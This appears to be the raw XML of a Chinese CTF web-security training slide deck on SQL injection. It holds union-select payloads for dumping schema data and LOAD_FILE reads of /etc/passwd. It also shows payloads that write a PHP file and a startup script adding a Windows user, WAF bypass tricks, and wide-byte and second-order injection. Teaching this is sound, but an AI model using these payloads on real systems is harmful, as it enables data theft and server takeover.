                  <a:pt x="10" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="103"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17" y="88"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="45" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="88"/>
                </a:ln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58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6" name="文本框 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1435100" y="4886325"/>
            <a:ext cx="2976563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8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CONCENTS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="48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077" name="直接连接符 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303338" y="4679950"/>
            <a:ext cx="3240087" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="284D7A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078" name="任意多边形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6057900" y="2046288"/>
            <a:ext cx="534988" cy="344487"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 892894"/>
              <a:gd name="txT" fmla="*/ 0 h 560440"/>
              <a:gd name="txR" fmla="*/ 892894 w 892894"/>
              <a:gd name="txB" fmla="*/ 560440 h 560440"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="116343" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="192058" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="75714" y="130155"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="130155"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="892894" h="560440">
                <a:moveTo>
                  <a:pt x="540889" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="892894" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352004" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540889" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="0F2437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9" name="任意多边形 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6326188" y="2046288"/>
            <a:ext cx="533400" cy="344487"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 892894"/>
              <a:gd name="txT" fmla="*/ 0 h 560440"/>
              <a:gd name="txR" fmla="*/ 892894 w 892894"/>
              <a:gd name="txB" fmla="*/ 560440 h 560440"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="115310" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="190353" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="75042" y="130155"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="130155"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="892894" h="560440">
                <a:moveTo>
                  <a:pt x="540889" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="892894" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352004" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540889" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="284D7A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0" name="任意多边形 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6057900" y="3033713"/>
            <a:ext cx="534988" cy="344487"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 892894"/>
              <a:gd name="txT" fmla="*/ 0 h 560440"/>
              <a:gd name="txR" fmla="*/ 892894 w 892894"/>
              <a:gd name="txB" fmla="*/ 560440 h 560440"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="116343" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="192058" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="75714" y="130155"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="130155"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="892894" h="560440">
                <a:moveTo>
                  <a:pt x="540889" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="892894" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352004" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540889" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="0F2437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1" name="任意多边形 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6326188" y="3033713"/>
            <a:ext cx="533400" cy="344487"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 892894"/>
              <a:gd name="txT" fmla="*/ 0 h 560440"/>
              <a:gd name="txR" fmla="*/ 892894 w 892894"/>
              <a:gd name="txB" fmla="*/ 560440 h 560440"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="115310" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="190353" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="75042" y="130155"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="130155"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="892894" h="560440">
                <a:moveTo>
                  <a:pt x="540889" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="892894" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352004" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540889" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="284D7A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2" name="任意多边形 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6057900" y="4097338"/>
            <a:ext cx="534988" cy="344487"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 892894"/>
              <a:gd name="txT" fmla="*/ 0 h 560440"/>
              <a:gd name="txR" fmla="*/ 892894 w 892894"/>
              <a:gd name="txB" fmla="*/ 560440 h 560440"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="116343" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="192058" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="75714" y="130155"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="130155"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="892894" h="560440">
                <a:moveTo>
                  <a:pt x="540889" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="892894" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352004" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540889" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="0F2437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3" name="任意多边形 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6326188" y="4097338"/>
            <a:ext cx="533400" cy="344487"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 892894"/>
              <a:gd name="txT" fmla="*/ 0 h 560440"/>
              <a:gd name="txR" fmla="*/ 892894 w 892894"/>
              <a:gd name="txB" fmla="*/ 560440 h 560440"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="115310" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="190353" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="75042" y="130155"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="130155"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="892894" h="560440">
                <a:moveTo>
                  <a:pt x="540889" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="892894" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352004" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540889" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="284D7A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4" name="任意多边形 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6057900" y="5192713"/>
            <a:ext cx="534988" cy="344487"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 892894"/>
              <a:gd name="txT" fmla="*/ 0 h 560440"/>
              <a:gd name="txR" fmla="*/ 892894 w 892894"/>
              <a:gd name="txB" fmla="*/ 560440 h 560440"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="116343" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="192058" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="75714" y="130155"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="130155"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="892894" h="560440">
                <a:moveTo>
                  <a:pt x="540889" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="892894" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352004" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540889" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="0F2437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5" name="任意多边形 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6326188" y="5192713"/>
            <a:ext cx="533400" cy="344487"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 892894"/>
              <a:gd name="txT" fmla="*/ 0 h 560440"/>
              <a:gd name="txR" fmla="*/ 892894 w 892894"/>
              <a:gd name="txB" fmla="*/ 560440 h 560440"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="115310" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="190353" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="75042" y="130155"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="130155"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="892894" h="560440">
                <a:moveTo>
                  <a:pt x="540889" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="892894" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352004" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="560440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540889" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="284D7A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6" name="文本框 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7689850" y="3013710"/>
            <a:ext cx="181165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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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088" name="文本框 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7689850" y="4085590"/>
            <a:ext cx="152971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LFI &amp;&amp; RFI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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5830" y="210820"/>
            <a:ext cx="2124710" cy="314960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7689850" y="5149215"/>
            <a:ext cx="272224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File Uploading Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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" name="文本框 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7689850" y="1933575"/>
            <a:ext cx="76390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Intro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1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Timing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盲注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625"/>
            <a:ext cx="9457690" cy="26149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练习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http://58.154.33.13:8002/login.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"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矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322263" y="881063"/>
            <a:ext cx="11552237" cy="5568950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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文本框 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460115" y="3113405"/>
            <a:ext cx="5276850" cy="777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4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx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注入进一步利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="XCTFb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猜解表名、字段名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Information_schema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数据库存储了整个数据库的结构信息，存放在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Information_schema.tables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Information_schema.columns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表中；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limit a,b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偏移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爆数据库名：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id=200' union select 1,2,database()#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爆表名：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id=200' union select 1,table_name,3  from information_schema.tables where table_schema='test' limit 0,1#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爆列名：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id=200' union select 1,column_name,3  from information_schema.columns where table_name='admin' limit 0,1#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文件读写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读取关键文件：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 LOADFILE('/etc/passwd');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写入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 '&lt;?php phpinfo(); ?&gt;' into dumpfile '/var/www/html/1.php'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（知道绝对路径）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l="983"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="730885" y="3145790"/>
            <a:ext cx="10973435" cy="2295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85" y="5319395"/>
            <a:ext cx="10973435" cy="8026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文件读写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mysql5.7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之后，引入了secure-file-priv新特性用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()。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720" y="2759710"/>
            <a:ext cx="8355330" cy="27501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文件读写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请在此输入您的文本。请在此输入您的文本。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65" y="1825625"/>
            <a:ext cx="7122795" cy="2273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265" y="4098925"/>
            <a:ext cx="11645265" cy="20789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利用数据库对服务器写启动脚本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id=1 union select 1,2,3,”net user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern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cimer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800" kern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cimer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/ad” into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern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outfile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 ‘c\documents and settings\all users\start menu\programs\startup\add.bat’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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命令执行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矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322263" y="881063"/>
            <a:ext cx="11552237" cy="5568950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3451225" y="4381500"/>
            <a:ext cx="18399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TEXT  HERE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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5131" name="文本框 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3517900" y="2655888"/>
            <a:ext cx="170688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进一步利用</a:t>
            </a:r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5132" name="文本框 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6792913" y="4381500"/>
            <a:ext cx="18415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TEXT  HERE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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4102" name="文本框 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="3048000"/>
            <a:ext cx="232156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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx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WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx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绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="XCTFb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任意多边形 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1782763" y="0"/>
            <a:ext cx="3582987" cy="1990725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 3582460"/>
              <a:gd name="txT" fmla="*/ 0 h 1991022"/>
              <a:gd name="txR" fmla="*/ 3582460 w 3582460"/>
              <a:gd name="txB" fmla="*/ 1991022 h 1991022"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="3328710" y="1990131"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="255333" y="1990131"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1543474"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="882324" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2701718" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="3584041" y="1543474"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB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9" name="任意多边形 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="1990725"/>
            <a:ext cx="2484438" cy="3089275"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 2483870"/>
              <a:gd name="txT" fmla="*/ 0 h 3088328"/>
              <a:gd name="txR" fmla="*/ 2483870 w 2483870"/>
              <a:gd name="txB" fmla="*/ 3088328 h 3088328"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="2485574" y="3091170"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="882540" y="3091170"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1545586"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="882540" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2485574" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB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0" name="任意多边形 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2065338" y="4154488"/>
            <a:ext cx="4710112" cy="2703512"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 4711161"/>
              <a:gd name="txT" fmla="*/ 0 h 2702918"/>
              <a:gd name="txR" fmla="*/ 4711161 w 4711161"/>
              <a:gd name="txB" fmla="*/ 2702918 h 2702918"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="3548990" y="2704700"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1159025" y="2704700"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="672689"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="383691" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="4324326" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="4708012" y="672689"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB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1" name="文本框 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3651250" y="4822825"/>
            <a:ext cx="1751330" cy="18586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1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284D7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00</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="11500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="284D7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2" name="文本框 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750050" y="2587625"/>
            <a:ext cx="1371600" cy="7156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Intro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000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4103" name="文本框 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7327900" y="3406775"/>
            <a:ext cx="1205230" cy="7988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4104" name="直接连接符 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8939213" y="1704975"/>
            <a:ext cx="0" cy="3598863"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="EBEDEC">
                <a:alpha val="50195"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:bevel/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="XCTFb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WAF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绕过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双写关键字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大小写绕过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编码绕过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变换姿势绕过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使用特殊字符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双写关键字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应对简单的非迭代的将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or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等关键字替换为空字符串的防御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payload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seselectlect from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where username='x' OorR 1=1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大小写绕过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应对简单的区分大小写的关键字匹配，比如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中preg_match函数没有加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/i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参数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payload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Or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编码绕过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ASCII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admin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可以用CHAR(97)+char(100)+char(109)+char(105)+char(110)代替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select * from admin where username=(CHAR(97)+char(100)+char(109)+char(105)+char(110))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16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进制：extractvalue(0x3C613E61646D696E3C2F613E,0x2f61)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unicode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编码：单引号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%u0027 、%u02b9、%u02bc、%u02c8、%u2032、%uff07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URL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编码：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or 1=1——%6f%72%20%31%3d%31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变换姿势绕过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Or    &lt;------------&gt;  ||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and  &lt;--------&gt; &amp;&amp;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空格被限制：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select(username)from(admin)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科学计数法绕过：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where username=1e1union select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=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&lt;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&gt;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被限制：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where id in (1,2)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where id between 1 and 3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like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access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中使用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dlookup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绕过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 from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被限制：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(user=12',info=dlookup('[user]','userinfo','[id]=1')%00)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特殊字符绕过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2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空格被限制：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/**/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%a0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%0a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%0d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%09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tab....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内联注释：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 1 from /*!admin*/ /*!union*/ select 2,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MYSQL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对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%00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不会截断：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se%00lect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单一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%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号，在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asp+iis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中会被忽略：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sel%ect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``mysql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反引号之间的会被当做注释内容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练习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http://58.154.33.13:8001/login.php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http://58.154.33.13:8003/?order=name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矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322263" y="881063"/>
            <a:ext cx="11552237" cy="5568950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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文本框 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4403090" y="3039745"/>
            <a:ext cx="3600450" cy="777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400" b="1" dirty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4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx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注入杂技</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="XCTFb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二次注入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攻击者将恶意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语句插入到数据库中，程序对数据库内容毫无防备，直接带入查询。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对来自于内部的输入输出过于信任。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插入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aaaaaaaaaaa...aaaaa\'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这样的足够长的数据，导致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\'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中的引号被截断，剩下的反斜杠造成注入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545" y="3244215"/>
            <a:ext cx="9914255" cy="18383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宽字节注入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当数据库使用了宽字符集（如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GBK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），会将一些两个字符单做一个字符，如：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0xbf27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0xbf5c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反斜杠是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0x5c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，使用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addslashes()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等转义函数在处理输入时会将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'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\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这些字符用反斜杠转义，输入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0xbf27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，转以后变成了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0xbf5c27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5c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被当做了汉字一部分，单引号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0x27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逃逸出来。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payload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id=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狷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'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CTF-WEB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个人感悟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也是一个逆向的过程，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猜测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服务的代码逻辑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出题也是一种学习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例子：flag vending machine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理解机制，有理可循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ACCESS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偏移注入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能够知道表名，不知道字段名，并且某些位置不能回显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借助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union select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inner join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以及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*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字符，将未知字段查询出来，并且打乱顺序，从而将所有字段查询出来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step1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：猜字段数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d=123 union select 1,2,3,4,5,6,7,8 from 